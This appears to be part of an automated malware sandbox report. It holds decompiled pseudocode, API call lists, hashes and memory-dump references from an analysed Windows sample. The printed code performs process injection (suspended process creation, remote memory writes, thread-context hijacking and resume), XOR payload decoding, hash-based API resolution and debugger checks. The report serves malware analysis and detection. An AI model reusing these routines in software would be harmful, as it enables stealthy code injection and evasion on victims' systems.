							_t121 = WriteProcessMemory(_v68.hProcess, _t184,  &_v140, 0x42,  &_v28); // executed
							_t237 = _t121 - 1;
							if(_t121 == 1) {
								_v36 = _t188;
								_t155 =  &_v896;
								E00858F20(_t155, 0x2cc);
								_v896 = 0x10001;
								_t123 = E0084BF50(_t237, 0, 0x4bbc7e4);
								_t188 =  *_t123(_v68.hThread, _t155);
								E0084BF50(_t237, 0, 0xd1a4de8);
								_t196 = _t196 + 0x18;
								_t126 = VirtualProtectEx(_v68.hProcess, _t184, 0x42, 0x10,  &_v28); // executed
								if(_t126 == 1) {
									_t239 = _t188 - 1;
									_t172 = 1;
									_v712 = _t184;
									if(_t188 == 1) {
										E0084BF50(_t239, 0, E00849D50(0x60ce8748));
										_t196 = _t196 + 0xc;
										_t136 = SetThreadContext(_v68.hThread, _t155); // executed
										_t68 = _t136 != 1;
										_t241 = _t68;
										_t172 = 0 | _t68;
									}
									_t185 = _t172;
									_t188 = E0084BF50(_t241, 0, 0xd1a4de8);
									_t128 = E00849D50(0x647400ec);
									_t196 = _t196 + 0xc;
									_t129 = VirtualProtectEx(_v68.hProcess, _v24, _v36, _t128,  &_v28); // executed
									if(_t129 == 1) {
										_t243 = _t185;
										if(_t185 == 0) {
											E0084BF50(__eflags, 0, E00849D50(0x6f5727e8));
											_t196 = _t196 + 0xc;
											_push(_v68.hThread);
										} else {
											E0084BF50(_t243, 0, 0x68b1574);
											_t196 = _t196 + 8;
											_push(0);
											_push(0);
											_push(0);
											_push(_v20);
											_push(0);
											_push(0);
											_push(_v68);
										}
										ResumeThread(); // executed
									}
								}
							}
						}
					}
					goto L19;
				} else {
					_t157 = _v48;
					_t137 = 0;
					_v36 = _t180;
					_v72 = _t188;
					do {
						_v20 = _t137;
						 *(_t188 + _t137) =  *(_t188 + _t137) ^ _t157;
						_t139 = _t157 << 8;
						_v52 = _t139;
						_v44 =  !_t139;
						_v40 = E00843750(0,  !_t139, 0x9b6b004f);
						_v40 = E00842DC0(0, E00849D50(0xff1f00e3) &  !(_t157 >> 0x18), _t157 >> 0x00000018 & 0xffffffb0) ^ (_v52 & 0x6494ff00 | _v40);
						_t180 = _v36;
						_v44 = E008420A0(0, E00842DC0(0, _v44,  !(_t157 >> 0x18)), 0xffffffff);
						_t148 = E00849D50(0xff1f00e3);
						E00842DC0(0, _v52, _t157 >> 0x18);
						_t150 = E008422E0(0, 0, 1);
						_t207 = _t207 + 0x38;
						_v20 = _v20 - _t150;
						_t157 = (_t148 | 0x6494ffb0) & _v44 | _v40;
						_t188 = _v72;
						_t137 = _v20;
						_t234 = _t137 - _t180;
					} while (_t137 != _t180);
					goto L8;
				}
			}

0x0084ae40
0x0084ae4c
0x0084ae51
0x0084ae56
0x0084ae5b
0x0084ae60
0x0084ae65
0x0084ae6a
0x0084ae76
0x0084b2de
0x0084b2de
0x0084ae7c
0x0084ae81
0x0084ae88
0x0084b2b4
0x0084b2c4
0x0084b2ce
0x0084b2ce
0x0084ae9e
0x0084aea3
0x0084aea6
0x0084aeb8
0x0084aeba
0x0084aebf
0x0084aec1
0x0084aec4
0x00000000
0x00000000
0x0084aeca
0x0084aed3
0x0084aee1
0x0084aef1
0x0084aef9
0x0084af03
0x0084af12
0x0084af17
0x0084af2e
0x0084af30
0x0084af33
0x00000000
0x00000000
0x0084af44
0x0084af4d
0x0084af52
0x0084af62
0x0084af64
0x0084af66
0x00000000
0x00000000
0x0084af6c
0x0084af74
0x0084af77
0x0084af7d
0x0084af87
0x0084af91
0x0084af99
0x0084af9d
0x0084afa9
0x0084afae
0x0084afb1
0x0084afb8
0x0084afba
0x0084afbd
0x0084b08d
0x0084b08d
0x0084b09b
0x0084b0a0
0x0084b0af
0x0084b0b1
0x0084b0b4
0x0084b0ba
0x0084b0c3
0x0084b0c8
0x0084b0d9
0x0084b0db
0x0084b0dd
0x0084b0e7
0x0084b0ef
0x0084b0f2
0x0084b0f8
0x0084b0fb
0x0084b10b
0x0084b114
0x0084b11a
0x0084b11e
0x0084b13e
0x0084b146
0x0084b149
0x0084b153
0x0084b160
0x0084b176
0x0084b17d
0x0084b187
0x0084b18c
0x0084b19d
0x0084b19f
0x0084b1a2
0x0084b1a8
0x0084b1b0
0x0084b1b7
0x0084b1bf
0x0084b1d0
0x0084b1de
0x0084b1e7
0x0084b1ec
0x0084b1fb
0x0084b200
0x0084b206
0x0084b209
0x0084b20e
0x0084b214
0x0084b226
0x0084b22b
0x0084b232
0x0084b239
0x0084b239
0x0084b239
0x0084b239
0x0084b23c
0x0084b250
0x0084b257
0x0084b25c
0x0084b26b
0x0084b270
0x0084b272
0x0084b274
0x0084b2a7
0x0084b2ac
0x0084b2af
0x0084b276
0x0084b27d
0x0084b282
0x0084b285
0x0084b287
0x0084b289
0x0084b28b
0x0084b28e
0x0084b290
0x0084b292
0x0084b292
0x0084b2b2
0x0084b2b2
0x0084b270
0x0084b200
0x0084b1a2
0x0084b0dd
0x00000000
0x0084afc3
0x0084afc3
0x0084afc6
0x0084afc8
0x0084afcb
0x0084afd0
0x0084afd0
0x0084afd3
0x0084afdd
0x0084afe0
0x0084afe7
0x0084affb
0x0084b027
0x0084b02b
0x0084b044
0x0084b04c
0x0084b066
0x0084b072
0x0084b077
0x0084b07a
0x0084b07d
0x0084b07f
0x0084b082
0x0084b085
0x0084b085
0x00000000
0x0084afd0

APIs

VirtualAllocEx.KERNELBASE(?,00000000,00000000,00003000,00000004), ref: 0084AF62
WriteProcessMemory.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 0084B0AF
VirtualAllocEx.KERNELBASE(?,00000000,00000042,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 0084B0D9
WriteProcessMemory.KERNELBASE(?,?,00000044,00000042,00000000), ref: 0084B19D
VirtualProtectEx.KERNELBASE(?,?,00000042,00000010,00000000), ref: 0084B1FB
SetThreadContext.KERNEL32(?,?), ref: 0084B232
VirtualProtectEx.KERNELBASE(?,?,?,00000000,00000000), ref: 0084B26B
ResumeThread.KERNELBASE(?), ref: 0084B2B2
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0084AF2E

Part of subcall function 0084BF50: LoadLibraryA.KERNEL32(?), ref: 0084C1A1

ExitProcess.KERNEL32(00000000), ref: 0084B2CE

Strings

D, xrefs: 0084AEE1

Memory Dump Source

Source File: 00000004.00000002.2156141244.0000000000841000.00000020.00020000.sdmp, Offset: 00840000, based on PE: true

Associated: 00000004.00000002.2156136083.0000000000840000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156155061.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156159856.0000000000862000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2156165848.0000000000865000.00000002.00020000.sdmp Download File

Similarity

API ID: ProcessVirtual$AllocMemoryProtectThreadWrite$ContextCreateExitLibraryLoadResume
String ID: D
API String ID: 2854380510-2746444292
Opcode ID: 174f6081901cb42b27eb45a8637522f348fbd737458264416b48e04c95f11e91
Instruction ID: 336f4ee70e6e60e1c6c741a163c2a043cc59cd6a0d1fd3652cb4c7ec3518f097
Opcode Fuzzy Hash: 174f6081901cb42b27eb45a8637522f348fbd737458264416b48e04c95f11e91
Instruction Fuzzy Hash: 69C18BB5D4421C6BEF10ABB89C43FAEB674FF54715F150024F918F7282EAA15E148BA3

Uniqueness

Uniqueness Score: -1.00%

Function 00920D28, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00000920,00003000,00000040,00000920,00920780), ref: 00920DE5
VirtualAlloc.KERNEL32(00000000,000005EB,00003000,00000040,009207E1), ref: 00920E1C
VirtualAlloc.KERNEL32(00000000,00022439,00003000,00000040), ref: 00920E7C
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00920EB2
VirtualProtect.KERNEL32(00840000,00000000,00000004,00920D07), ref: 00920FB7
VirtualProtect.KERNEL32(00840000,00001000,00000004,00920D07), ref: 00920FDE
VirtualProtect.KERNEL32(00000000,?,00000002,00920D07), ref: 009210AB
VirtualProtect.KERNEL32(00000000,?,00000002,00920D07,?), ref: 00921101
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0092111D

Memory Dump Source

Source File: 00000004.00000002.2156247701.0000000000920000.00000040.00020000.sdmp, Offset: 00920000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 046c22bfd6cc6457a861a1a9c923bc078a3a1c54b33ff9aed95f43ed8304fc38
Instruction ID: cd45dbbc1d1a69a82189aa7550a8ad8e4aa0a7bac9cf072faec4d1b4f3904002
Opcode Fuzzy Hash: 046c22bfd6cc6457a861a1a9c923bc078a3a1c54b33ff9aed95f43ed8304fc38
Instruction Fuzzy Hash: 9AD15C725002909FEB15CF54C881B5A77AAFFD8310B294194ED899F35FDB70B850CB66

Uniqueness

Uniqueness Score: -1.00%

Function 0085DA20, Relevance: 6.0, APIs: 4, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0085DA20() {
				char _v28;
				void* _t4;

				_t4 = CreateEventW(0, 1, 0, E00847200(0x8605f8,  &_v28));
				if(_t4 != 0) {
					SetEvent(_t4);
					_t4 = CloseHandle(_t4); // executed
				}
				SetLastError(0);
				return _t4;
			}

0x0085da3f
0x0085da47
0x0085da4c
0x0085da53
0x0085da53
0x0085da5b
0x0085da66

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0CD06773,?,-00861D33,?,008491EB,-00861D33,?,008477A1,00000001), ref: 0085DA3F
SetEvent.KERNEL32(00000000,?,?,0CD06773,?,-00861D33,?,008491EB,-00861D33,?,008477A1,00000001,?,-00861D33,?,00846A74), ref: 0085DA4C
CloseHandle.KERNEL32(00000000), ref: 0085DA53
SetLastError.KERNEL32(00000000,?,?,0CD06773,?,-00861D33,?,008491EB,-00861D33,?,008477A1,00000001,?,-00861D33,?,00846A74), ref: 0085DA5B

Memory Dump Source

Source File: 00000004.00000002.2156141244.0000000000841000.00000020.00020000.sdmp, Offset: 00840000, based on PE: true

Associated: 00000004.00000002.2156136083.0000000000840000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156155061.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156159856.0000000000862000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2156165848.0000000000865000.00000002.00020000.sdmp Download File

Similarity

API ID: Event$CloseCreateErrorHandleLast
String ID:
API String ID: 2055590504-0
Opcode ID: d6067108994e5cda9577c5ce1abc468e723409af6aff80864d9b67feae433789
Instruction ID: 7605fe2f0e5851376e13057062406a6d42cf466f1e42f043eaab2d42bb49afa8
Opcode Fuzzy Hash: d6067108994e5cda9577c5ce1abc468e723409af6aff80864d9b67feae433789
Instruction Fuzzy Hash: 2EE01271644614A7E61137E56C0AF6B362CFB00746F461050FB1DD9181E6D554548EBB

Uniqueness

Uniqueness Score: -1.00%

Function 0090914E, Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,00906F5C,00000001), ref: 0090915F
HeapDestroy.KERNEL32 ref: 00909195

Memory Dump Source

Source File: 00000004.00000002.2156170350.0000000000866000.00000020.00020000.sdmp, Offset: 00866000, based on PE: false

Similarity

API ID: Heap$CreateDestroy
String ID:
API String ID: 3296620671-0
Opcode ID: 44c17b602162394f9c05939322d3dc1f4e6b2e56001141f43a1b8ca82d119aed
Instruction ID: 5b9d79959d486756ba00253945c3beaf6fb469ee127cc094d21f0b18b9b9bf3a
Opcode Fuzzy Hash: 44c17b602162394f9c05939322d3dc1f4e6b2e56001141f43a1b8ca82d119aed
Instruction Fuzzy Hash: 15E012727BD3029EEB509B70AD0972975A8EB88B57F108839F401D50E1F7B68590FE08

Uniqueness

Uniqueness Score: -1.00%

Function 0085D770, Relevance: 3.0, APIs: 2, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0085D770() {
				char _v22;

				GetConsoleCP();
				GetFileAttributesW(E00847200(0x8605f8,  &_v22)); // executed
				return GetCapture();
			}

0x0085d776
0x0085d78e
0x0085d798

APIs

GetConsoleCP.KERNEL32 ref: 0085D776
GetFileAttributesW.KERNELBASE(00000000,?,?,?,?,?,?,0084AE51), ref: 0085D78E

Memory Dump Source

Source File: 00000004.00000002.2156141244.0000000000841000.00000020.00020000.sdmp, Offset: 00840000, based on PE: true

Associated: 00000004.00000002.2156136083.0000000000840000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156155061.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156159856.0000000000862000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2156165848.0000000000865000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesConsoleFile
String ID:
API String ID: 1533235433-0
Opcode ID: 3d3315599eb2376f57ff65aa7ae12f3577ab52a234cbf52082d37227651b8094
Instruction ID: 3a791dd19a5432adaf51fadae83cc9536da5271a58fd6844f0ab5cd807f5ba83
Opcode Fuzzy Hash: 3d3315599eb2376f57ff65aa7ae12f3577ab52a234cbf52082d37227651b8094
Instruction Fuzzy Hash: E2D0C7B1844509DBC64137A86C0E92B376CB914206B461460ED1695212F6E955588FBB

Uniqueness

Uniqueness Score: -1.00%

Function 0085B1B0, Relevance: 1.5, APIs: 1, Instructions: 23
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0085B1B0(intOrPtr _a4) {
				void* _t5;
				void* _t7;
				intOrPtr _t8;

				_t8 = _a4;
				_t13 = _t8;
				if(_t8 == 0) {
					__eflags = 0;
					return 0;
				}
				_t5 = E00849D50(0xfef6f706);
				E0084BF50(_t13, 0, 0x8685de3);
				_t7 = RtlAllocateHeap( *0x862124, 0, _t8 + _t5 + 0x657d085a); // executed
				return _t7;
			}

0x0085b1b4
0x0085b1b7
0x0085b1b9
0x0085b1eb
0x00000000
0x0085b1eb
0x0085b1c0
0x0085b1d6
0x0085b1e7
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00000000,?), ref: 0085B1E7

Memory Dump Source

Source File: 00000004.00000002.2156141244.0000000000841000.00000020.00020000.sdmp, Offset: 00840000, based on PE: true

Associated: 00000004.00000002.2156136083.0000000000840000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156155061.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156159856.0000000000862000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2156165848.0000000000865000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4f691b1cf12b461bef712e5144da4c9cb4ce6e40ff713576492bf10062304491
Instruction ID: f8101a80a99f6e1f03c5c20243c9a2a3f86dfcdff06c46dd3ead30fc7e1f1c42
Opcode Fuzzy Hash: 4f691b1cf12b461bef712e5144da4c9cb4ce6e40ff713576492bf10062304491
Instruction Fuzzy Hash: 43E0CD3394552C77C6513BD4AC23F577B48EF15765F150021FD0DE7151E641761886E2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 008569A0, Relevance: 7.6, APIs: 5, Instructions: 65
threadprocessCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E008569A0(void* __eflags) {
				intOrPtr _v32;
				signed int _v36;
				void* _v44;
				signed char _t13;
				signed int _t16;
				signed int _t19;
				long _t23;
				void* _t24;
				void* _t25;
				void* _t27;

				_t24 = CreateToolhelp32Snapshot(4, 0);
				_v44 = E00849D50(0x647400b0);
				_t23 = GetCurrentProcessId();
				_t13 = E008455C0(Thread32First(_t24,  &_v44), 0);
				_t27 = _t25 + 0xc;
				if((_t13 & 0x00000001) != 0) {
					L6:
					_t19 = 0;
				} else {
					0;
					0;
					while(GetLastError() != 0x12) {
						_t16 = E008455C0(_v32, _t23);
						_t27 = _t27 + 8;
						_t19 =  ~(_t16 & 0x00000001) & _v36;
						if(Thread32Next(_t24,  &_v44) != 0) {
							if(_t19 == 0) {
								continue;
							} else {
							}
						}
						goto L7;
					}
					goto L6;
				}
				L7:
				return _t19;
			}

0x008569b2
0x008569c1
0x008569ca
0x008569d9
0x008569de
0x008569e3
0x00856a25
0x00856a25
0x008569eb
0x008569eb
0x008569ef
0x008569f0
0x008569ff
0x00856a04
0x00856a11
0x00856a1d
0x00856a21
0x00000000
0x00000000
0x00856a23
0x00856a21
0x00000000
0x00856a1d
0x00000000
0x008569f0
0x00856a27
0x00856a30

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 008569AD
GetCurrentProcessId.KERNEL32 ref: 008569C4
Thread32First.KERNEL32(00000000,?), ref: 008569D1
GetLastError.KERNEL32 ref: 008569F0
Thread32Next.KERNEL32(00000000,?), ref: 00856A16

Memory Dump Source

Source File: 00000004.00000002.2156141244.0000000000841000.00000020.00020000.sdmp, Offset: 00840000, based on PE: true

Associated: 00000004.00000002.2156136083.0000000000840000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156155061.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156159856.0000000000862000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2156165848.0000000000865000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread32$CreateCurrentErrorFirstLastNextProcessSnapshotToolhelp32
String ID:
API String ID: 1709709923-0
Opcode ID: 94524597160c1665b455ed1db5e8aeabf7b102d4035ececa91682f1b32cb6319
Instruction ID: eb78fe5e125005429e711e1f601dd82d99aef57c6bc864530390533c97643c06
Opcode Fuzzy Hash: 94524597160c1665b455ed1db5e8aeabf7b102d4035ececa91682f1b32cb6319
Instruction Fuzzy Hash: 9F01D47294021857DB127AA8AC86FEF7A2CFB41316F880030FE04E6113F91589188172

Uniqueness

Uniqueness Score: -1.00%

Function 0090ABA4, Relevance: 7.6, APIs: 5, Instructions: 57COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0090ED8D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0090EDA2
UnhandledExceptionFilter.KERNEL32(0091DBB4), ref: 0090EDAD
GetCurrentProcess.KERNEL32(C0000409), ref: 0090EDC9
TerminateProcess.KERNEL32(00000000), ref: 0090EDD0

Memory Dump Source

Source File: 00000004.00000002.2156170350.0000000000866000.00000020.00020000.sdmp, Offset: 00866000, based on PE: false

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 7aa2236ecf9e158e02581e7d2835b3a8619a9754b58ad5e85418bc63ec18f383
Instruction ID: eb789e6cd3087fd4450eaf739652a9f9273ddf07eedd1cb8bd928d4239174f98
Opcode Fuzzy Hash: 7aa2236ecf9e158e02581e7d2835b3a8619a9754b58ad5e85418bc63ec18f383
Instruction Fuzzy Hash: D021E5B893D608DFD708DF64F9456983BB4BB0C344F424019E50D97260E7B66581EF95

Uniqueness

Uniqueness Score: -1.00%

Function 0084D830, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 280
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0084D830(signed int _a4, intOrPtr _a8) {
				signed short* _v20;
				CHAR* _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v140;
				void* _t78;
				void* _t79;
				void* _t83;
				void* _t93;
				signed short* _t100;
				signed short* _t102;
				void* _t105;
				void* _t112;
				char _t113;
				signed short* _t114;
				void* _t115;
				void* _t120;
				signed int _t122;
				signed int _t124;
				signed int _t133;
				void* _t135;
				intOrPtr _t136;
				signed int _t137;
				signed int _t139;
				_Unknown_base(*)()* _t141;
				char* _t143;
				signed int _t144;
				void* _t149;
				signed short* _t153;
				signed int _t155;
				intOrPtr _t159;
				void* _t160;
				signed char* _t161;
				void* _t165;
				intOrPtr _t166;
				_Unknown_base(*)()* _t170;
				signed short* _t173;
				CHAR* _t174;
				signed int _t175;
				void* _t176;
				void* _t177;
				void* _t178;
				void* _t180;
				void* _t183;
				void* _t187;
				void* _t191;
				void* _t192;
				void* _t199;

				_t133 = _a4;
				_t141 = 0;
				_t204 = _t133;
				if(_t133 != 0) {
					_t78 = E008512D0(_t204, _t133);
					_t149 = _t78;
					_t165 =  *((intOrPtr*)(_t78 + 0x60)) + _t133;
					_t79 = E00849D50(0x975b6640);
					_t141 = 0;
					_t180 = _t178 + 8;
					_t205 =  *((intOrPtr*)(_t79 + _t165 + 0xcd0992c));
					if( *((intOrPtr*)(_t79 + _t165 + 0xcd0992c)) != 0) {
						_t6 = _t165 + 0xcd09914; // 0xcd09914
						_t166 = _t79 + _t6;
						_v36 =  *((intOrPtr*)(_t149 + 0x64));
						_t153 =  *((intOrPtr*)(_t166 + 0x24)) + _t133 - E00849D50(0x60421690) + 0x436163c;
						_v32 = _t166;
						_t83 = E00841460(_t205, E00841460(_t205,  *((intOrPtr*)(_t166 + 0x20)), 0x5eaee274), _t133);
						_t183 = _t180 + 0x14;
						_v40 =  ~_t133;
						_t143 = _t83 + 0xa1511d8c;
						_t135 = 0;
						0;
						do {
							_v20 = _t153;
							_v24 = _t143;
							_t155 =  ~(E00841460(0,  ~( *_t143), _v40));
							E00841460(0,  *_t143, _a4);
							E00858F20( &_v140, E00849D50(0x647400c8));
							_t187 = _t183 + 0x1c;
							_t91 =  *_t155;
							if( *_t155 != 0) {
								_t176 = 0;
								do {
									 *((char*)(_t177 + _t176 - 0x88)) = E0085D680(0, _t91);
									_t176 = _t176 - E008422E0(0, 0, 1);
									E00841460(0, _t176, 1);
									_t187 = _t187 + 0x14;
									_t91 =  *(_t155 + _t176) & 0x000000ff;
								} while (( *(_t155 + _t176) & 0x000000ff) != 0);
							}
							_push(0xffffffff);
							_t93 = E008500A0( &_v140);
							_t183 = _t187 + 8;
							if(_t93 == _a8) {
								_t136 = _v32;
								_t170 = E00841460(__eflags, 0x637bf4a0 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x1c)) + _a4 - E00849D50(0xffb90b0) + 0x6b8f901c + ( *_v20 & 0x0000ffff) * 4)), _a4) + 0x9c840b60;
								_t100 = E008422E0(__eflags, _t136, 0x52cc09fc);
								_t159 = _v36;
								_v20 = _t100;
								E00841460(__eflags, _t136, _t159);
								_t141 = _t170;
								_t191 = _t183 + 0x1c;
								__eflags = _t170 - _t136;
								if(_t170 > _t136) {
									_t102 = _v20;
									__eflags = _t141 - _t159 + _t102 + 0x52cc09fc;
									if(_t141 < _t159 + _t102 + 0x52cc09fc) {
										_v24 =  *_t141;
										_v20 = _t141;
										_t105 = E00847DD0(0x82);
										_t192 = _t191 + 4;
										_t144 = _v24;
										_t137 = 0;
										__eflags = _t144 - _t105;
										if(_t144 != _t105) {
											_t122 = _t144;
											_t175 = 0;
											__eflags = 0;
											0;
											do {
												 *(_t177 + _t175 - 0x88) = _t122;
												_t124 = E00841460(__eflags, E008422E0(__eflags, 0, _t175), 0xffffffff);
												_t137 =  ~_t124;
												E00841460(__eflags, _t175, 1);
												_t192 = _t192 + 0x18;
												_t175 = _t137;
												_t122 =  *(_v20 - _t124) & 0x000000ff;
												__eflags = _t122 - 0x2e;
											} while (__eflags != 0);
										}
										_t160 = E00841460(__eflags, _t137, E00849D50(0x3638cbc4));
										E00841460(__eflags, _t137, 1);
										_v24 = _v20 + _t160 - 0x524ccb67;
										 *((char*)(_t177 + _t137 - 0x88)) = E00847DD0(0x82);
										 *((char*)(_t177 + _t160 - 0x524ccbef)) = 0x64;
										_t112 = E00849D50(0x8707952b);
										 *((char*)(_t177 + _t137 - 0x86)) = 0x6c;
										_t113 = E00847DD0(0xc0);
										_v28 = 0;
										 *((char*)(_t137 - _t112 +  &_v140 - 0x1c8c6a76)) = _t113;
										_t114 = _v20;
										 *((char*)(_t177 + _t137 - 0x84)) = 0;
										_t173 = _t114;
										_t115 = E00847DD0(0x8f);
										_t199 = _t192 + 0x24;
										__eflags =  *((intOrPtr*)(_t114 + _t160 - 0x524ccb67)) - _t115;
										if( *((intOrPtr*)(_t114 + _t160 - 0x524ccb67)) != _t115) {
											_t174 = _v24;
										} else {
											_t139 = _v24[1];
											__eflags = _t139;
											if(_t139 == 0) {
												_t174 =  &_v28;
											} else {
												_t161 = _t160 + _t173 - 0x524ccb65;
												do {
													_t120 = E008455A0(_v28, 0xa);
													_t199 = _t199 + 8;
													_v28 = _t139 + _t120 - 0x30;
													_t139 =  *_t161 & 0x000000ff;
													_t161 =  &(_t161[1]);
													__eflags = _t139;
												} while (_t139 != 0);
												_t174 =  &_v28;
											}
										}
										_t141 = GetProcAddress(LoadLibraryA( &_v140), _t174);
									}
								}
							} else {
								goto L7;
							}
							goto L22;
							L7:
							_t135 = _t135 + 1;
							_t143 =  &(_v24[4]);
							_t153 =  &(_v20[1]);
						} while (_t135 <  *((intOrPtr*)(_v32 + 0x18)));
						_t141 = 0;
					}
				}
				L22:
				return _t141;
			}

0x0084d839
0x0084d83c
0x0084d83e
0x0084d840
0x0084d847
0x0084d852
0x0084d854
0x0084d85b
0x0084d860
0x0084d862
0x0084d865
0x0084d86d
0x0084d873
0x0084d873
0x0084d880
0x0084d894
0x0084d89f
0x0084d8af
0x0084d8b4
0x0084d8bb
0x0084d8be
0x0084d8c4
0x0084d8cc
0x0084d8d0
0x0084d8d2
0x0084d8d5
0x0084d8ea
0x0084d8f0
0x0084d90d
0x0084d912
0x0084d915
0x0084d919
0x0084d91b
0x0084d920
0x0084d92c
0x0084d942
0x0084d944
0x0084d949
0x0084d94c
0x0084d950
0x0084d920
0x0084d954
0x0084d95d
0x0084d962
0x0084d968
0x0084d98d
0x0084d9c4
0x0084d9d0
0x0084d9d8
0x0084d9db
0x0084d9e0
0x0084d9e5
0x0084d9e7
0x0084d9ea
0x0084d9ec
0x0084d9f2
0x0084d9fc
0x0084d9fe
0x0084da06
0x0084da0e
0x0084da11
0x0084da16
0x0084da19
0x0084da1c
0x0084da1e
0x0084da20
0x0084da22
0x0084da24
0x0084da24
0x0084da2c
0x0084da30
0x0084da30
0x0084da45
0x0084da51
0x0084da56
0x0084da5b
0x0084da61
0x0084da65
0x0084da68
0x0084da68
0x0084da30
0x0084da83
0x0084da88
0x0084da9a
0x0084daaa
0x0084dab1
0x0084dabe
0x0084dac8
0x0084dad7
0x0084dae5
0x0084daec
0x0084daf3
0x0084daf6
0x0084db05
0x0084db0c
0x0084db11
0x0084db14
0x0084db16
0x0084db54
0x0084db18
0x0084db1e
0x0084db21
0x0084db23
0x0084db59
0x0084db25
0x0084db25
0x0084db30
0x0084db35
0x0084db3a
0x0084db44
0x0084db47
0x0084db4a
0x0084db4b
0x0084db4b
0x0084db4f
0x0084db4f
0x0084db23
0x0084db70
0x0084db70
0x0084d9fe
0x00000000
0x00000000
0x00000000
0x00000000
0x0084d96a
0x0084d973
0x0084d974
0x0084d977
0x0084d97a
0x0084d983
0x0084d983
0x0084d86d
0x0084db72
0x0084db7b

APIs

LoadLibraryA.KERNEL32(?), ref: 0084DB62
GetProcAddress.KERNEL32(00000000,?), ref: 0084DB6A

Strings

d, xrefs: 0084DAB1
l, xrefs: 0084DAC8

Memory Dump Source

Source File: 00000004.00000002.2156141244.0000000000841000.00000020.00020000.sdmp, Offset: 00840000, based on PE: true

Associated: 00000004.00000002.2156136083.0000000000840000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156155061.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156159856.0000000000862000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2156165848.0000000000865000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: d$l
API String ID: 2574300362-91452987
Opcode ID: fc9f1ad76682cd74886c831a46a4681702b90a6957b090de646d89c7f2f4c649
Instruction ID: 2191ad605c800c1986143d022cc722a7e186cfe535ab7062a421ba0c0b2a6ca1
Opcode Fuzzy Hash: fc9f1ad76682cd74886c831a46a4681702b90a6957b090de646d89c7f2f4c649
Instruction Fuzzy Hash: B29118B6D0021D9BDF109FB8EC42ABE7BA5FF15358F450064EC49F7342E6359A4887A2

Uniqueness

Uniqueness Score: -1.00%

Function 00841A00, Relevance: 3.0, APIs: 2, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00841A00() {
				intOrPtr _t9;
				WCHAR* _t10;
				struct HINSTANCE__* _t15;

				_t9 =  *0x8620d8; // 0x53325ec4
				_t10 = _t9 + 0xffffffd4;
				_t15 = (_t10 | 0x00000008) * _t10;
				CreateDialogParamW(_t15, _t10, _t15, _t15, _t15);
				GetVersion();
				return (_t10 * (_t15 + (_t15 + _t15 ^ 0x00000032) | _t10) ^ 0xffffffb4) + (_t15 + (_t15 + _t15 ^ 0x00000032) | _t10);
			}

0x00841a06
0x00841a0c
0x00841a15
0x00841a1d
0x00841a39
0x00841a47

APIs

CreateDialogParamW.USER32 ref: 00841A1D
GetVersion.KERNEL32(?,00848614,0000031F,?,00846AB1,?,0084AE51), ref: 00841A39

Memory Dump Source

Source File: 00000004.00000002.2156141244.0000000000841000.00000020.00020000.sdmp, Offset: 00840000, based on PE: true

Associated: 00000004.00000002.2156136083.0000000000840000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156155061.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156159856.0000000000862000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2156165848.0000000000865000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDialogParamVersion
String ID:
API String ID: 1068622756-0
